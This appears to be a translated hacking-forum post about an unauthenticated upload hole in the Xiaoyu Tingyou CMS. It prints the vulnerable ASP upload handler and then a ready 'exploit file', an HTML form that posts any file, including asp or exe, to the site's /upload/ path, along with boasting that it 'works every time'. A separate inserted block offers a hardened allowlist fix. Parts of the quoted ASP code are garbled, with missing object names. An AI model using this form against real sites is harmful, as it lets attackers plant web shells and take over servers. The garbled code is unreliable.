(Did the author leave us a backdoor?)
Xiaoyu Tingyou website content management system:
Currently the most powerful whole-site system: it contains the modules that general websites need, such as news articles, downloads, films, pictures and music, which are independent yet closely connected with each other. It supports unlimited classification, free calling and templates, and all front-end pages are generated as HTML to save as much system resources as possible. The best choice for large and medium-sized portals.
The content pages are generated as HTML, which is relatively safe. I looked at the admin back end and there seems to be no big problem.
But when you go to the upload directory, you will find two files
There is verification in them, but there are no restrictions. Let's take a look at the source code:
CODE:
<link rel="stylesheet" type="text/css" href="../admin/">
<script language="JavaScript">
<!-- Hide from older browsers...
//Function to add pic
function Addpic(imagePath){
();
(InsertImage, false, imagePath);
}
// -->
</script>
<% =1900 %>
<%
UpFilePath="NewsIMG/"
fileweb="UPLOAD/"
nameset =1
pathset =0
dim i
i=1
%>
<%
function makefilename(fname)
fname = now()
fname = replace(fname,"-","")
fname = replace(fname," ","")
fname = replace(fname,":","")
makefilename=fname
end function
%>
<!--#include FILE="upload_5xsoft.inc"-->
<%
dim upload,file,formName,iCount
dim url,url1
set upload=new upload_5xSoft ' Create an upload object
iCount=0
for each formName in ' List all uploaded files
set file=(formName) ' Generate a file object
if >0 then
fname = makefilename(now()) & iCount & "." & GetExtendName()
(UpFilePath&fname) ' Save the file
iCount=iCount+1
"Picture"&i&" <input type=""text"" name="""&i&"" size=""55"" style=""border-style: solid; border-width: 1"" value=""../"&fileweb&UpFilePath&fname&"""><br>[ <a href=# onclick=""Addpic(../"&fileweb&UpFilePath&fname&" "">Click here to add the picture "&i&" to the editor</a> ]<br>"
i=i+1
set file=nothing
end if
next
set upload=nothing ' Delete this object
function GetExtendName(FileName)
dim ExtName
ExtName = LCase(FileName)
ExtName = right(ExtName,3)
ExtName = right(ExtName,3-Instr(ExtName,"."))
GetExtendName = ExtName
end function
%>
Haha, you can build an upload page yourself and upload directly; even an exe file is OK, let alone asp or something.
And the page shows the file's address after uploading, so this is simply a backdoor left by the author.
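A hardened form of the extension handling above, as an added example that is not part of the original post or the CMS's own code: it takes the text after the last dot of the client-supplied name and accepts it only on an exact allowlist match. `SafeExtension`, `IsAllowedImage`, the allowlist and the sample file names are assumptions made for illustration.

```vbscript
<%
' Added example, not the CMS's code. SafeExtension and IsAllowedImage are
' hypothetical helper names; the allowlist is an assumption to adjust per site.

' Text after the last dot, lower-cased; "" when the name has no extension.
Function SafeExtension(FileName)
    Dim pos
    SafeExtension = ""
    pos = InStrRev(FileName, ".")
    If pos > 0 And pos < Len(FileName) Then
        SafeExtension = LCase(Mid(FileName, pos + 1))
    End If
End Function

' True only for an exact match against the image allowlist, so script and
' executable extensions (asp, asa, exe, ...) never reach the save step.
Function IsAllowedImage(FileName)
    Select Case SafeExtension(FileName)
        Case "jpg", "jpeg", "gif", "png", "bmp"
            IsAllowedImage = True
        Case Else
            IsAllowedImage = False
    End Select
End Function

' Constructed sample names showing what the check lets through.
Dim names, n
names = Array("photo.JPG", "shell.asp", "tool.exe", "x.asa", "noext", "pic.jpeg")
For Each n In names
    Response.Write Server.HTMLEncode(n) & " -> "
    If IsAllowedImage(n) Then
        Response.Write "accepted as ." & SafeExtension(n)
    Else
        Response.Write "rejected"
    End If
    Response.Write "<br>"
Next
%>
```

In the handler this check belongs before the save call, with rejected files skipped. The page should also require the logged-in admin session, and the upload directory should be configured so the web server does not execute scripts from it.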
Exploit file:
CODE:
<html>
<head>
<title>File Upload</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
</head>
<body bgcolor="#D6EF7E" text="#000000">
<form name="form1" method="post" action="/upload/" enctype="multipart/form-data">
<input type="hidden" name="act" value="upload">
<div align="center">
<center>
<table width="98%" border="0" cellspacing="0" cellpadding="5" bordercolordark="#CCCCCC" bordercolorlight="#000000" style="border-collapse: collapse" bordercolor="#111111" height="102">
<tr>
<th height="16" align="left" valign="middle">
<div align="center">
<b>Picture Upload</b>
</div>
</th>
</tr>
<tr align="left" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="1" valign="top">
<input type="file" name="file1" style="width:200" class="tx1">
</td>
</tr>
<tr align="center" valign="middle">
<td align="left" height="5" bgcolor="#FFFFFF">
</td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td bgcolor="#FFFFFF" height="28">
<input type="submit" name="Submit" value="· Submit ·" class="bt">
<input type="reset" name="Submit2" value="· Re-execution·" class="bt"></td>
</tr>
<tr align="center" valign="middle" bgcolor="#eeeeee">
<td height="14" bgcolor="#FFFFFF"> </td>
</tr>
</table>
</center>
</div>
</form>
</body>
</html>
It works every time, haha. It's fun.
Article: Bad
Source: Evil Octal Information Security Team